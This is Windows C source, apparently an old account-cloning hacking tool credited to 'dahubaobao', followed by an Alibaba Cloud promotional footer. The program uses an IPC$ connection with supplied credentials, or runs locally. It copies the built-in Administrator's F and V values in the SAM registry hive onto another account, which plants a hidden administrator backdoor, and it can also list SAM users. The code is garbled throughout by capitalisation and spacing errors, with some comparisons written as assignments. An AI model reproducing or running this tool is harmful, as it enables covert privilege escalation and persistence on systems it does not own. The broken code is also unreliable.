# Define debugmsg
# Include <windows. h>
# Include <winnetwk. h>
# Include <tchar. h>
# Include <stdio. h>
# Pragma comment (Lib, "MIP. lib ")
# Define debug (x) outputdebugstring (text (x ))
# Define erron getlasterror ()
# Define allocbuffer (1024*10)
# Define remote_host_len 20
# Define set_connect_ipc 0 // use IPC
# Define not_connect_ipc 1 // do not use
Typedef struct ipcinfo
{
Tchar remoteip [remote_host_len]; // remote IP Address
Tchar remoteuser [remote_host_len]; // User Name
Tchar remotepass [remote_host_len]; // Password
Uint isipc: 1; // whether to use IPC
} Ipcinfo, * pipcinfo, * lpipcinfo;
Tchar IPC [100] = {0 };
Tchar name [50] [1, 100] = {0 };
DWORD keyn = 0;
// Clone an account
Bool cloneuser (in tchar * cloneuser, in lpipcinfo );
Bool openkey (in tchar * openkey, in hkey connhkey); // open the subkey
Bool viewuser (in tchar * viewkey); // enumerate registry user information
Bool listuser (in lpipcinfo); // list registry user information
Bool connipc (in lpipcinfo); // IPC connection
// Handle errors
Inline void messageerror (tchar * funcname, DWORD errorid, bool msgflag)
{
Tchar * message = NULL;
Tchar msgerror [max_path] = {0 };
Formatmessage (format_message_allocate_buffer | format_message_from_system, null,
Errorid, makelangid (lang_neutral, sublang_default), (tchar *) & message, 0, null );
If (msgflag)
_ Ftprintf (stderr, text ("% s getlasterror reports % d and % s/n"), funcname, errorid, message );
If (! Msgflag)
{
_ Stprintf (msgerror, text ("% s getlasterror reports % d and % s/n"), funcname, errorid, message );
Debug (msgerror );
}
If (Message)
Localfree (Message );
}
Bool cloneuser (in tchar * cloneuser, in lpipcinfo)
{
Hkey connhkey = NULL, hkey = NULL, clonehkey = NULL;
Lpbyte lpdataf = NULL, lpdatav = NULL;
Tchar clonesid [100] = {0}, machinename [20] = {0 };
DWORD lpsizef = allocbuffer, lpsizev = allocbuffer;
DWORD regtype = REG_BINARY;
Bool flag = false;
_ Try
{
If (lpipcinfo-> isipc = set_connect_ipc) // process IPC connection
{
_ Tprintf (text ("connect remote registry.../N "));
If (! (Connipc (lpipcinfo )))
{
Flag = true;
_ Leave;
}
_ Tcscpy (machinename, text ("////"));
_ Tcscat (machinename, lpipcinfo-> remoteip );
// Connect to the Remote Registry
If (regconnectregistry (machinename, HKEY_LOCAL_MACHINE, & connhkey )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regconnectregistry ()", erron, true );
# Endif
Flag = true;
_ Leave;
}
}
Else
{
Connhkey = HKEY_LOCAL_MACHINE;
}
Lpdataf = (lpbyte) malloc (allocbuffer );
Lpdatav = (lpbyte) malloc (allocbuffer );
If (lpdataf = NULL | lpdatav = NULL)
{
# Ifdef debugmsg
Messageerror ("malloc ()", erron, true );
# Endif
Flag = true;
_ Leave;
}
_ Tcscpy (clonesid, text ("Sam // domains // account // users // 00000 "));
_ Tcscat (clonesid, cloneuser );
// Enable aministrator
If (regopenkeyex (connhkey, text ("Sam // domains // account // users // 000001f4"), 0, key_all_access, & hkey )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regopenkeyex ()", erron, true );
# Endif
Flag = true;
_ Leave;
}
// Obtain F information
If (regqueryvalueex (hkey, text ("F"), null, & regtype, lpdataf, & lpsizef )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regqueryvalueex ()", erron, true );
# Endif
Flag = true;
_ Leave;
}
// Obtain V Information
If (regqueryvalueex (hkey, text ("v"), null, & regtype, lpdatav, & lpsizev )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regqueryvalueex ()", erron, true );
# Endif
Flag = true;
_ Leave ;;
}
// Open the account to be cloned
If (regopenkeyex (HKEY_LOCAL_MACHINE, clonesid, 0, key_all_access, & clonehkey )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regopenkeyex ()", erron, true );
# Endif
Flag = true;
_ Leave;
}
// Set F
If (regsetvalueex (clonehkey, text ("F"), 0, REG_BINARY, lpdataf, lpsizef )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regsetvalueex ()", erron, true );
# Endif
Flag = true;
_ Leave;
}
// Set V
If (regsetvalueex (clonehkey, text ("v"), 0, REG_BINARY, lpdatav, lpsizev) = error_success)
{
_ Tprintf (text ("clone user success/N "));
}
Else
{
# Ifdef debugmsg
Messageerror ("regsetvalueex ()", erron, true );
# Endif
Flag = true;
_ Leave;
}
}
_ Finally
{
If (lpdataf)
Free (lpdataf );
If (lpdatav)
Free (lpdatav );
If (hkey)
Regclosekey (hkey );
If (clonehkey)
Regclosekey (clonehkey );
}
If (FLAG)
Return false;
Else
Return true;
}
Bool openkey (in tchar * openkey, in hkey connhkey)
{
Hkey = NULL;
Tchar tempname [100] = {0}, buffername [100] = {0 };
DWORD tempsize = 100, ret = 0;
If (regopenkeyex (connhkey, openkey, 0, key_all_access, & hkey )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regopenkeyex ()", erron, true );
# Endif
Return false;
}
For (DWORD I = 0, Index = 0; ret = error_success; I ++, index ++, keyn ++)
{
// Enumerate users
Ret = regenumkeyex (hkey, index, tempname, & tempsize, null );
_ Tcscat (name, tempname );
Memset (tempname, 0, sizeof (tempname ));
Tempsize = sizeof (tempname );
Sleep (50 );
}
If (hkey)
Regclosekey (hkey );
Return true;
}
Bool viewuser (in tchar * viewkey)
{
Hkey = NULL;
DWORD regtype = 0;
If (regopenkeyex (HKEY_LOCAL_MACHINE, viewkey, 0, key_all_access, & hkey )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regopenkeyex ()", erron, true );
# Endif
Return false;
}
If (regqueryvalueex (hkey, null, null, & regtype, null, null )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regopenkeyex ()", erron, true );
# Endif
Regclosekey (hkey );
Return false;
}
_ Tprintf (text ("% x/N"), regtype );
If (hkey)
Regclosekey (hkey );
Return true;
}
Bool listuser (in lpipcinfo)
{
Hkey connhkey = NULL;
Tchar machinename [20] = {0 };
Tchar regtemp [50] = {0 };
Tchar regbuffer [100] = {text ("Sam // domains // account // users // names //")};
DWORD ret = 0;
If (lpipcinfo-> isipc = set_connect_ipc)
{
_ Tprintf (text ("connect remote registry.../N "));
If (! (Connipc (lpipcinfo )))
Return false;
_ Tcscpy (machinename, text ("////"));
_ Tcscat (machinename, lpipcinfo-> remoteip );
If (regconnectregistry (machinename, HKEY_LOCAL_MACHINE, & connhkey )! = Error_success)
{
# Ifdef debugmsg
Messageerror ("regconnectregistry ()", erron, true );
# Endif
Return false;
}
}
Else
{
Connhkey = HKEY_LOCAL_MACHINE;
}
If (! (Openkey (text ("Sam // domains // account // users // names"), connhkey )))
Return false;
For (DWORD n = 0; n <KeyN-1; n ++)
{
_ Tcscat (regbuffer, name [N]);
Wsprintf (regtemp, name [N]);
_ Tcscat (regtemp, text ("==> "));
_ Tprintf (text ("% s"), regtemp );
If (! (Viewuser (regbuffer )))
Return false;
_ Tcscpy (regbuffer, text ("Sam // domains // account // users // names //"));
Sleep (10 );
}
Return true;
}
Bool connipc (in lpipcinfo)
{
Netresource NR;
_ Sntprintf (IPC, sizeof (IPC)-1, text ("// % S // IPC $"), lpipcinfo-> remoteip );
Nr. lplocalname = NULL;
Nr. lpprovider = NULL;
Nr. dwtype = resourcetype_any;
Nr. lpremotename = IPC;
If (wnetaddconnection2 (& NR, lpipcinfo-> remotepass, lpipcinfo-> remoteuser, 0 ))
{
# Ifdef debugmsg
Messageerror ("wnetaddconnection2 ()", erron, true );
# Endif
Return false;
}
Return true;
}
Int main (INT argc, tchar * argv [])
{
Ipcinfo = {0 };
If (argc = 1)
{
_ Tprintf (text ("code by dahubaobao/N "));
Return 0;
}
If (argc = 3) // local clone
{
If (_ tcsicmp (argv [1], text ("-c") = 0)
{
If (_ tcslen (argv [2])> 5)
{
_ Tprintf (text ("User Sid no larger than/" 5/"/N "));
Return 0;
}
Ipcinfo. isipc = not_connect_ipc; // do not use IPC connection
If (! (Cloneuser (argv [2], & ipcinfo )))
Return 0;
}
}
If (argc = 6) // remote clone
{
If (_ tcsicmp (argv [1], text ("-c") = 0)
{
If (_ tcslen (argv [2])> 5)
{
_ Tprintf (text ("User Sid no larger than/" 5/"/N "));
Return 0;
}
Ipcinfo. isipc = set_connect_ipc; // use IPC
_ Tcsncpy (ipcinfo. remoteip, argv [3], REMOTE_HOST_LEN-1 );
_ Tcsncpy (ipcinfo. remoteuser, argv [4], REMOTE_HOST_LEN-1 );
_ Tcsncpy (ipcinfo. remotepass, argv [5], REMOTE_HOST_LEN-1 );
If (! (Cloneuser (argv [2], & ipcinfo )))
Return 0;
}
}
If (argc = 2) // list local users
{
If (_ tcsicmp (argv [1], text ("-l") = 0)
{
Ipcinfo. isipc = not_connect_ipc;
If (! (Listuser (& ipcinfo )))
Return 0;
}
}
If (argc = 5) // list remote users
{
If (_ tcsicmp (argv [1], text ("-l") = 0)
{
Ipcinfo. isipc = set_connect_ipc;
_ Tcsncpy (ipcinfo. remoteip, argv [2], REMOTE_HOST_LEN-1 );
_ Tcsncpy (ipcinfo. remoteuser, argv [3], REMOTE_HOST_LEN-1 );
_ Tcsncpy (ipcinfo. remotepass, argv [4], REMOTE_HOST_LEN-1 );
If (! (Listuser (& ipcinfo )))
Return 0;
}
}
If (ipcinfo. isipc = set_connect_ipc)
{
If (wnetcancelconnection2 (IPC, 0, true) // disconnect IPC
{
# Ifdef debugmsg
Messageerror ("wnetcancelconnection2 ()", erron, true );
# Endif
Return 0;
}
}
Return 0;
}
Source: dahu_baobao
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
